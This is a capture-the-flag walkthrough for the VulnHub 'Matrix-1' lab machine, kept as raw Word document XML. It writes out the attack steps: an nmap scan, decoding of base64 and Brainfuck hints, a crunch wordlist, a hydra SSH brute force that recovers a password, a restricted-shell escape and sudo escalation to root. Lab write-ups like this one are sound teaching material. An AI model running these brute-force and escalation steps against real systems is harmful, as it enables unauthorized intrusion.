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118" w:rsidRDefault="00E8749B">
      <w:r>
        <w:t xml:space="preserve">VM: </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="006A0B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/matrix-1,259/#download</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E8749B" w:rsidRDefault="00E4776D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22306CCC" wp14:editId="443D4752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6D" w:rsidRDefault="00E4776D"/>
    <w:p w:rsidR="00CA7DB7" w:rsidRDefault="00CA7DB7" w:rsidP="00CA7DB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65B14" w:rsidRDefault="00CA7DB7" w:rsidP="00CA7DB7">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 192.168.21.143  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA7DB7" w:rsidRDefault="0037221C" w:rsidP="00CA7DB7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DCB7750" wp14:editId="684EB30A">
            <wp:extent cx="5229225" cy="2788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560" cy="27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221C" w:rsidRDefault="0037221C" w:rsidP="00CA7DB7"/>
    <w:p w:rsidR="0037221C" w:rsidRDefault="00D4214A" w:rsidP="00CA7DB7">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="006A0B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.143/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D4214A" w:rsidRDefault="00D4214A" w:rsidP="00CA7DB7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46A43FAE" wp14:editId="45EE89E2">
            <wp:extent cx="5743575" cy="275581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2322" cy="27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4A" w:rsidRDefault="00D4214A" w:rsidP="00CA7DB7"/>
    <w:p w:rsidR="00D4214A" w:rsidRDefault="00471041" w:rsidP="00CA7DB7">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="006A0B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.143:31337/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00471041" w:rsidRDefault="003E723B" w:rsidP="00CA7DB7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CD208F6" wp14:editId="18428042">
            <wp:extent cx="5943600" cy="303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46" w:rsidRDefault="00464446" w:rsidP="00464446">
      <w:r>
        <w:t>We take a look at the source code of the web service running on port 31337 and find a base64 encoded string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91E50" w:rsidRDefault="00E91E50" w:rsidP="00464446">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B1C58A" wp14:editId="06958470">
            <wp:extent cx="5943600" cy="2084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50" w:rsidRDefault="00E91E50" w:rsidP="00464446"/>
    <w:p w:rsidR="00055C4B" w:rsidRDefault="00055C4B" w:rsidP="00464446">
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055C4B" w:rsidRDefault="00055C4B" w:rsidP="00464446">
      <w:r w:rsidRPr="00055C4B">
        <w:t>ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A85FC4" w:rsidRDefault="00A85FC4" w:rsidP="00464446"/>
    <w:p w:rsidR="003E723B" w:rsidRDefault="00464446" w:rsidP="00464446">
      <w:r>
        <w:t>We decode the base64 encoded string and find a hint to that is related “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cypher.matrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02029" w:rsidRDefault="00A02029" w:rsidP="00A0202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64446" w:rsidRDefault="00A02029" w:rsidP="00A02029">
      <w:r>
        <w:t xml:space="preserve">└─# echo "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=" | base64 </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02029" w:rsidRDefault="000A78CF" w:rsidP="00A02029">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10766EEE" wp14:editId="458F9076">
            <wp:extent cx="5943600" cy="68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4D" w:rsidRDefault="003D5458" w:rsidP="003D5458">
      <w:r>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A78CF" w:rsidRDefault="003D5458" w:rsidP="003D5458">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D5458">
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D5458">
        <w:t xml:space="preserve"> "Then you'll see, that it is not the spoon that bends, it is only yourself. " &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D5458">
        <w:t>Cypher.matrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003D5458" w:rsidRDefault="003D5458" w:rsidP="003D5458"/>
    <w:p w:rsidR="0034514D" w:rsidRDefault="009C1CFD" w:rsidP="003D5458">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="006A0B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.21.143:31337/Cypher.matrix</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009C1CFD" w:rsidRDefault="002311B1" w:rsidP="003D5458">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D77C54A" wp14:editId="1D735F88">
            <wp:extent cx="5943600" cy="2296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8" w:rsidRDefault="00B66668" w:rsidP="00B66668">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>download</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002311B1" w:rsidRDefault="00B66668" w:rsidP="00B66668">
      <w:r>
        <w:t>We take a look at the content of the file and find “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brainfuck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” encoded string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB247E" w:rsidRDefault="00FB247E" w:rsidP="00FB247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B66668" w:rsidRDefault="00FB247E" w:rsidP="00FB247E">
      <w:r>
        <w:t xml:space="preserve">└─# cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cypher.matrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FB247E" w:rsidRDefault="00FB5F34" w:rsidP="00FB247E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F136DC4" wp14:editId="20E8CC8C">
            <wp:extent cx="5943600" cy="7329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FA" w:rsidRDefault="00253FFA" w:rsidP="00FB247E"/>
    <w:p w:rsidR="00253FFA" w:rsidRDefault="00253FFA" w:rsidP="00FB247E"/>
    <w:p w:rsidR="00253FFA" w:rsidRDefault="00253FFA" w:rsidP="00253FFA"/>
    <w:p w:rsidR="00970E9F" w:rsidRDefault="00970E9F" w:rsidP="00253FFA"/>
    <w:p w:rsidR="00970E9F" w:rsidRDefault="00CA7616" w:rsidP="00970E9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29275" cy="20955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FFA">
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
      <w:r w:rsidR="00970E9F" w:rsidRPr="006475B7">
        <w:t xml:space="preserve">We decode the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00970E9F" w:rsidRPr="006475B7">
        <w:t>brainfuck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00970E9F" w:rsidRPr="006475B7">
        <w:t xml:space="preserve"> encoded string using this site here and find an incomplete password for the user “guest”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00253FFA" w:rsidRDefault="00253FFA" w:rsidP="00253FFA">
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="006A0B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.splitbrain.org/_static/ook/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00253FFA" w:rsidRDefault="004B5CE4" w:rsidP="00253FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DEA5E2C" wp14:editId="36648B97">
            <wp:extent cx="5943600" cy="2891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FA" w:rsidRDefault="00253FFA" w:rsidP="00253FFA">
      <w:r>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00253FFA" w:rsidRDefault="00253FFA" w:rsidP="00253FFA">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> k1ll0rXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00253FFA" w:rsidRDefault="00253FFA" w:rsidP="00253FFA"/>
    <w:p w:rsidR="001D0428" w:rsidRDefault="001D0428" w:rsidP="001D0428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70E9F" w:rsidRDefault="001D0428" w:rsidP="001D0428">
      <w:r>
        <w:t>└─# crunch 8 8 -t k1ll0r%@ -o dict.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D0428" w:rsidRDefault="00404545" w:rsidP="001D0428">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="363109CA" wp14:editId="0364CE08">
            <wp:extent cx="5286375" cy="164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D3" w:rsidRDefault="00F323D3" w:rsidP="00F323D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04545" w:rsidRDefault="00F323D3" w:rsidP="00F323D3">
      <w:r>
        <w:t xml:space="preserve">└─# hydra -l guest -P dict.txt 192.168.21.143 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00F323D3" w:rsidRDefault="00EA24E9" w:rsidP="00F323D3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AF07D61" wp14:editId="69A0657F">
            <wp:extent cx="5943600" cy="101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1B" w:rsidRDefault="00154C1B" w:rsidP="00154C1B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>login :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> guest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00154C1B" w:rsidRDefault="00154C1B" w:rsidP="00154C1B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C867B3" w:rsidRPr="00C867B3">
        <w:t>k1ll0r7n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00154C1B" w:rsidRDefault="00154C1B" w:rsidP="00154C1B"/>
    <w:p w:rsidR="00C867B3" w:rsidRDefault="00C867B3" w:rsidP="00C867B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6475B7" w:rsidRDefault="00C867B3" w:rsidP="00C867B3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21" w:history="1">
        <w:r w:rsidRPr="006A0B2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>guest@192.168.21.143</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C867B3" w:rsidRDefault="00675173" w:rsidP="00C867B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="463D0A9A" wp14:editId="035F41B4">
            <wp:extent cx="494347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73" w:rsidRDefault="009B39BE" w:rsidP="00C867B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B39BE">
        <w:t>guest@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B39BE">
        <w:t>:~$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B39BE" w:rsidRDefault="009B39BE" w:rsidP="00C867B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B39BE">
        <w:t>guest@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B39BE">
        <w:t>:~$ $PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B39BE" w:rsidRDefault="009B39BE" w:rsidP="00C867B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B39BE">
        <w:t>guest@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B39BE">
        <w:t>:~$ echo /home/guest/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B39BE">
        <w:t>prog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B39BE">
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B39BE" w:rsidRDefault="009B39BE" w:rsidP="00C867B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B39BE">
        <w:t>guest@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B39BE">
        <w:t>:~$ echo $SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004539EB" w:rsidRDefault="0042234F" w:rsidP="00C867B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F9A1A0D" wp14:editId="4E6C10C8">
            <wp:extent cx="5943600" cy="1633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CF" w:rsidRDefault="00305CCF" w:rsidP="00305CCF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B39BE">
        <w:t>guest@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B39BE">
        <w:t>:~$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>vi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00305CCF" w:rsidRDefault="00DB516E" w:rsidP="00C867B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BF10878" wp14:editId="19DBDDDE">
            <wp:extent cx="1400175" cy="657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6E" w:rsidRDefault="00DB516E" w:rsidP="00C867B3"/>
    <w:p w:rsidR="0042234F" w:rsidRDefault="00E57DDC" w:rsidP="00C867B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E57DDC">
        <w:t>guest@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E57DDC">
        <w:t>:~$ export SHELL=/bin/bash</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E57DDC">
        <w:t>:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E57DDC">
        <w:t>SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2623" w:rsidRDefault="00D35C3F" w:rsidP="00C867B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D35C3F">
        <w:t>guest@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D35C3F">
        <w:t>:~$ export PATH=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D35C3F">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D35C3F">
        <w:t>/bin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D35C3F">
        <w:t>:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D35C3F">
        <w:t>PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00103607" w:rsidRDefault="00A02DFC" w:rsidP="00C867B3">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A02DFC">
        <w:t>guest@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A02DFC">
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A02DFC">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A02DFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02DFC">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00103607" w:rsidRPr="00103607">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35C3F" w:rsidRDefault="00103607" w:rsidP="00C867B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69D97098" wp14:editId="65113FE9">
            <wp:extent cx="5372100" cy="1343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E3" w:rsidRDefault="008B3CE3" w:rsidP="008B3CE3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>guest@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~$ export PATH=/bin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02DFC" w:rsidRDefault="008B3CE3" w:rsidP="008B3CE3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>guest@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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8B3CE3" w:rsidRDefault="008B3CE3" w:rsidP="008B3CE3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B3CE3">
        <w:t>root@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B3CE3">
        <w:t>:/home/guest# cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B3CE3" w:rsidRDefault="008B3CE3" w:rsidP="008B3CE3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B3CE3">
        <w:t>root@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B3CE3">
        <w:t>:~# ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B3CE3" w:rsidRDefault="008B3CE3" w:rsidP="008B3CE3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B3CE3">
        <w:t>root@porteus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B3CE3">
        <w:t>:~# cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B3CE3" w:rsidRPr="003D5458" w:rsidRDefault="008B3CE3" w:rsidP="008B3CE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61484FA1" wp14:editId="6A65E5F6">
            <wp:extent cx="5943600" cy="2663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CE3" w:rsidRPr="003D5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2A5"/>
    <w:rsid w:val="00041118"/>
    <w:rsid w:val="00055C4B"/>
    <w:rsid w:val="000A78CF"/>
    <w:rsid w:val="00103607"/>
    <w:rsid w:val="00154C1B"/>
    <w:rsid w:val="001D0428"/>
    <w:rsid w:val="002311B1"/>
    <w:rsid w:val="00253FFA"/>
    <w:rsid w:val="00265B14"/>
    <w:rsid w:val="00305CCF"/>
    <w:rsid w:val="00330181"/>
    <w:rsid w:val="0034514D"/>
    <w:rsid w:val="0037221C"/>
    <w:rsid w:val="003772A5"/>
    <w:rsid w:val="003D5458"/>
    <w:rsid w:val="003E723B"/>
    <w:rsid w:val="00404545"/>
    <w:rsid w:val="00421184"/>
    <w:rsid w:val="0042234F"/>
    <w:rsid w:val="004539EB"/>
    <w:rsid w:val="00464446"/>
    <w:rsid w:val="00471041"/>
    <w:rsid w:val="004B5CE4"/>
    <w:rsid w:val="00626861"/>
    <w:rsid w:val="006475B7"/>
    <w:rsid w:val="00675173"/>
    <w:rsid w:val="008B2623"/>
    <w:rsid w:val="008B3CE3"/>
    <w:rsid w:val="00970E9F"/>
    <w:rsid w:val="009B39BE"/>
    <w:rsid w:val="009C1CFD"/>
    <w:rsid w:val="00A02029"/>
    <w:rsid w:val="00A02DFC"/>
    <w:rsid w:val="00A50A8D"/>
    <w:rsid w:val="00A85FC4"/>
    <w:rsid w:val="00B66668"/>
    <w:rsid w:val="00C867B3"/>
    <w:rsid w:val="00CA7616"/>
    <w:rsid w:val="00CA7DB7"/>
    <w:rsid w:val="00CD2F41"/>
    <w:rsid w:val="00D35C3F"/>
    <w:rsid w:val="00D4214A"/>
    <w:rsid w:val="00DB516E"/>
    <w:rsid w:val="00E4776D"/>
    <w:rsid w:val="00E57DDC"/>
    <w:rsid w:val="00E8749B"/>
    <w:rsid w:val="00E91E50"/>
    <w:rsid w:val="00EA24E9"/>
    <w:rsid w:val="00F323D3"/>
    <w:rsid w:val="00FB247E"/>
    <w:rsid w:val="00FB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D3F75"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{91D2EB33-7499-43D6-9D37-697DB586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74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92.168.21.143:31337/Cypher.matrix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mailto:guest@192.168.21.143" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.21.143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splitbrain.org/_static/ook/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hyperlink" Target="https://www.vulnhub.com/entry/matrix-1,259/#download" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.21.143:31337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89</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-05T11:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-05T14:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>